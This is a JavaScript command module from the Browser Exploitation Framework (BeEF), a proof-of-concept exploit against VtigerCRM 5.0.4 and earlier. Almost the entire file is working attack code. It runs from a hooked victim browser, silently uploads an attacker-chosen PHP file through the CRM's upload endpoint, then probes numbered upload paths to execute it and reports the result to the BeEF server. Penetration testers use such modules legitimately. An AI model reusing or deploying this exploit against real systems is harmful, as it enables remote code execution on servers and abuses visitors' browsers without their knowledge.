//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

// VtigerCRM <= 5.0.4 "chained exploitation" PoC 
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :) 

// Ported to Ruby BeEF by xntrik 2010

beef.execute(function() {

	//Doing the same trick I used in detect_tor to ensure exploit runs once
	// xntrik

	if (document.getElementById('vtigerimg')) {
		//document.body.removeChild(document.getElementById('vtigerimg'));
		//beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=There was a stagnant vtiger ID. Aborted!');	
		return "Exploit running already";
	}

	var img = new Image();
	img.setAttribute("style","visibility:hidden");
	img.setAttribute("width","0");
	img.setAttribute("height","0");
	img.id = 'vtigerimg';

	document.body.appendChild(img);

	baseurl = "<%= @vtiger_url %>";

	function get_ajax() {
		var http_request;
	    // use the ActiveX control for IE5.x and IE6
	    try {
	        http_request = new ActiveXObject("MSXML2.XMLHTTP");
	    } catch (othermicrosoft){
	        try {
	            http_request = new ActiveXObject("Microsoft.XMLHTTP");
	        } catch (native) {
	            // If IE7, Mozilla, Safari, etc: Use native object
	            http_request = new XMLHttpRequest();
	        }
	    }
	    return http_request;
	}

	function do_upload(){ 
		setTimeout(function() {ajax_upload()}, 1000);
	}

	// In a nutshell: 
	// 
	// 1) build url 
	// 2) construct the request object
	// 3) POST the form 
	// 4) once requestdone, call do_callfile()

	function ajax_upload(){ 
		var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';

	    var http_request;
	    
	    http_request = false;
	    http_request = get_ajax();

		if (!http_request) {
			// fail silently!
			return false;
		}

		//prepare the POST 
		var boundaryString = 'PWNED';
		var boundary = '-----------------------------PWNED';
		var requestbody =
		boundary + '\r\n'
		+ 'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + '\r\n' 
		+ '\r\n' 
		+ 3000000 + '\r\n'
		+ boundary
		+ '\r\n'
		+ 'Content-Disposition: form-data; name="return_module"' + '\r\n' 
		+ '\r\n'
		+ '\r\n'
		+ boundary
		+ '\r\n'
		+ 'Content-Disposition: form-data; name="return_action"' + '\r\n' 
		+ '\r\n'
		+ '\r\n'
		+ boundary
		+ '\r\n'
		+ 'Content-Disposition: form-data; name="return_id"' + '\r\n' 
		+ '\r\n'
		+ '\r\n' 
		+ boundary
		+ '\r\n'
		+ 'Content-Disposition: form-data; name="uploadsubject"' + '\r\n' 
		+ '\r\n' 
		+ '\r\n' 
		+ boundary
		+ '\r\n'
		+ 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n' 
		+ 'Content-Type: application/x-httpd-php' + '\r\n' 
		+ '\r\n'
		+ '<%= @vtiger_php %>' + '\r\n'
		+ '\r\n'
		+ boundary
		+ '\r\n'                                   
		+ 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n'
		+ '\r\n' 
		+ '<%= @mal_filename %>.<%= @mal_ext %>'
		+ '\r\n'
		+ boundary
		+ '\r\n'
		+ 'Content-Disposition: form-data; name="txtDescription"' + '\\r\n' 
		+ '\r\n' 
		+ 'drop it like its hot' + '\r\n' 
		+ boundary 
		+ '\r\n'
		+ 'Content-Disposition: form-data; name="save"' + '\r\n' 
		+ '\r\n' 
		+ 'Attach' + '\r\n' 
		+ boundary;

		var uploadstate = 0;

		http_request.onreadystatechange = function() {
			if (http_request.readyState == 4) {
				if (http_request.status == 200) {
					uploadstate = 3;
				} else {
					uploadstate = 2;
				}
			} else {
				uploadstate = 1;
			}
			return;
		};
		http_request.open("POST", targeturl, true);
		http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
		http_request.setRequestHeader("Content-length", requestbody.length);
		http_request.send(requestbody);

		setTimeout(function() {
			if (uploadstate == 0) {
				//something went way wrong
				document.body.removeChild(document.getElementById('vtigerimg'));
				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Error in file upload');
			} else if (uploadstate == 1) {
				//we never got a response from the server
				document.body.removeChild(document.getElementById('vtigerimg'));
				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server did not respond while trying to upload file');
			} else if (uploadstate == 2) {
				//we got a response that was NOT a 200
				document.body.removeChild(document.getElementById('vtigerimg'));
				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server gave an invalid response while trying to upload file');
			} else if (uploadstate == 3) {
				//We got a 200, so hopefully the file was uploaded
				//be_graceful();
				do_callfile(0, 1000);
			}
		},<%= @upload_timeout %>);

		return;
	}

	function do_callfile(start, count){
		if (document.getElementById('vtigerimg') == null) {
			return false;
		}

		for (i=start;i<=start+count;i++)
		{
			 var http_request = false;
			 http_request = get_ajax();
			 if (!http_request) {
				 // fail silently!
				return false;
			}

			var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";
			var requestbody = "birds of a feather flock together";
			
			http_request.open('POST', findurl, false);
			http_request.setRequestHeader("Content-length", requestbody.length);
			http_request.send(requestbody);
			if (http_request.status == 200) {
				document.body.removeChild(document.getElementById('vtigerimg'));
				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=File Uploaded AND Executed ('+findurl+')');
				return;
			}

		}
		return;
	}

	// Try the upload 
	function do_main(){
		do_upload();
		return;
	}

	// Run the sploit
	do_main();

});
